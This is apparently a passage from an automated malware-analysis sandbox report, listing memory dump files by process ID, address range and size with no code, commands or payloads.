                                                                                                                                                                        • memory/3188-248-0x000001F4FBC80000-0x000001F4FBCE7000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/3188-247-0x000001F4FBBC0000-0x000001F4FBC04000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          272KB

                                                                                                                                                                        • memory/3516-286-0x0000000005660000-0x0000000005661000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          4KB

                                                                                                                                                                        • memory/3576-126-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/3792-202-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/3856-142-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/3984-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4004-138-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4132-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4148-203-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4236-252-0x0000024398400000-0x0000024398467000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/4236-283-0x000002439A800000-0x000002439A905000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          1MB

                                                                                                                                                                        • memory/4280-204-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4392-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4436-176-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4484-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4500-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4516-289-0x0000000001460000-0x0000000001461000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          4KB

                                                                                                                                                                        • memory/4516-288-0x0000000005510000-0x0000000005511000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          4KB

                                                                                                                                                                        • memory/4608-287-0x0000000005170000-0x0000000005171000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          4KB

                                                                                                                                                                        • memory/4632-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4664-278-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          284KB

                                                                                                                                                                        • memory/4704-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4704-184-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4708-208-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4720-220-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4748-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4756-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4756-189-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4800-210-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4808-193-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4844-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4880-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4884-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4892-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4952-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4964-198-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4964-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4972-213-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4992-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4996-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5000-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5016-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5024-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5056-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5060-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5076-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5080-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5116-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5132-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5156-245-0x00000000047A0000-0x00000000047DA000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          232KB

                                                                                                                                                                        • memory/5156-246-0x0000000004830000-0x0000000004886000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          344KB

                                                                                                                                                                        • memory/5172-279-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          284KB

                                                                                                                                                                        • memory/5176-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5184-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5260-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5320-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5328-244-0x0000000002980000-0x0000000002B1C000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          1MB

                                                                                                                                                                        • memory/5408-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5420-277-0x00000000059C0000-0x0000000005A04000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          272KB

                                                                                                                                                                        • memory/5452-292-0x0000000005690000-0x0000000005C96000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          6MB

                                                                                                                                                                        • memory/5536-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5612-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5672-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5676-291-0x000002840AB70000-0x000002840AB90000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          128KB

                                                                                                                                                                        • memory/5676-282-0x000002840AB50000-0x000002840AB70000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          128KB

                                                                                                                                                                        • memory/5676-280-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          7MB

                                                                                                                                                                        • memory/5716-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5760-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5776-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5860-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5900-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/6036-242-0x0000000000000000-mapping.dmp